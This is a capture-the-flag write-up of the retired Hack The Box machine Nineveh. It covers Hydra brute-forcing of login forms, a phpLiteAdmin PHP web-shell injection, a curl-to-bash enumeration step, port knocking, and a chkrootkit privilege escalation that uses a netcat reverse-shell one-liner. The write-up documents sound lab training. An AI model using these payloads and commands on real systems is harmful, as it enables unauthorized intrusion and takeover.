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File metadata and controls

230 lines (170 loc) · 7.59 KB


This is the write-up for the box Nineveh that got retired at the 16th December 2017. My IP address was while I did this.

Let's put this in our hosts file:    nineveh.htb


Starting with a Nmap scan:

nmap -sC -sV -o nmap/nineveh.nmap
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1

The SSL certificate exposes the hostname nineveh.htb and a potential username admin@nineveh.htb.

Checking HTTP (Port 80)

On the web page there is a default "It works!" Apache page with no additional information. Lets look for hidden paths with Gobuster:

gobuster -u dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

It outputs /department path which forwards to /department/login.php with a login form.

Department login page

Lets try to brute-force the credentials with Hydra:

hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64

After finishing, it found the password for the user admin:


When login in with the credentials, the web page shows an "Under Construction!" image. The menu Notes shows the following information:

Have you fixed the login page yet! hardcoded username and password is really bad idea!

check your serect folder to get in! figure it out! this is your challenge

Improve the db interface.

The potential username amrois is disclosed. When looking at the URL of the Notes menu, it looks like a file path:

After playing around with it, it becomes clear that this page looks for the string ninevehNotes and everything without .txt results in a PHP error, which means we need to create a PHP file somehow to get code execution.

Checking HTTPS (Port 443)

On the HTTPS web page there is an image with no additional information. Lets look for hidden paths with Gobuster:

gobuster -u dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

It outputs /db path which wants a password for phpLiteAdmin v1.9 and /secure_notes path which displays an image without additional information.

phpLiteAdmin login page

Lets try to brute-force the credentials with Hydra:

hydra -l admin -P /usr/share/wordlists/rockyou.txt https-post-form "/db/index.php:password=^PASS^&login=Log+In&proc_login=true:Incorrect" -t 64

After finishing, it found a valid password:


Exploiting the database

Lets look for vulnerabilities in phpLiteAdmin:

searchsploit phpliteadmin

The result called PHPLiteAdmin 1.9.3 - Remote PHP Code Injection is a vulnerability that allows to put PHP code in a database, rename that database with a PHP extension and then execute the code.

Create new database called ninevehNotes:

phpLiteAdmin create database

Create table with PHP command:

<?php echo system($\_REQUEST["cmd"]); ?>

phpLiteAdmin create table

Rename the database so it has a PHP extension:

phpLiteAdmin rename database

Now we can browse back to the HTTP page to replace ninevehNotes.txt to ninevehNotes.php and try to execute a whoami command.

This works and displays the username www-data which means we got code execution. Now lets start a reverse shell:


After sending this request, the listener on my IP and port 9001 starts a session on the box as www-data.

Privilege Escalation

To get an attack surface on the box we execute any Linux Enumeration script.

curl /| bash

Analyzing the output, the following information is interesting:

  • Localhost listens on port 22 (SSH)
  • Root path has a non-default folder called /report that belongs to the user amrois

Privilege Escalation to user

The path /secure_notes on the web page with the nineveh.png image is there for a reason. When downloading it and analyzing it with binwalk it turns out that a gzip file is hidden inside of it. Lets extract everything out of the image:

binwalk -Me nineveh.png

In the extracted tar file, there is a RSA Public key ( and a RSA Private key (nineveh.priv). The public key is for the user amrois so lets try to SSH into the box:

chmod 600 nineveh.priv

ssh -i nineveh.priv amrois@nineveh.htb

It returns nothing because port 22 is closed as the initial scan showed us, but on the local enumeration it showed that SSH listens on localhost. Looking at the services, there is a service called knockd that is a Port Knocking service. The configuration file for this is in /etc/knockd.conf that looks like this:

 logfile = /var/log/knockd.log
 interface = ens33

 sequence = 571, 290, 911
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

It tells us, that knocking on port 571, 290, 911 allows access to port 22. A port knock works by sending a TCP packet to the ports.

for i in 571 290 911; do nmap -Pn -p $i --host-timeout 201 --max-retries 0; done

Now checking for port 22 on the box with Nmap, it displays that it is open:

nmap -p 22
22/tcp open  ssh

Access to SSH with the private key works now and we get in as amrois:

ssh -i nineveh.priv amrois@

Privilege Escalation to root

In the /report path there are several .txt reports that are created with one minute difference which means there is a probably a cronjob running that is doing this.

Lets look at the processes with Pspy:


chmod +x pspy


Every minute the box runs the /usr/bin/chkrootkit program. The reports found in the /report folder hold the content of the chkrootkit program.

When looking for vulnerabilities in this program, there is a Privilege Escalation for this tool:

searchsploit chkrootkit

# Output
Chkrootkit 0.49 - Local Privilege Escalation

For this vulnerability it is required to create /tmp/update so chkrootkit automatically executes it. The file will include the code to return a reverse shell:

rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 9002 >/tmp/g

After a minute, the listener on my IP and port 9002 starts a reverse shell as root!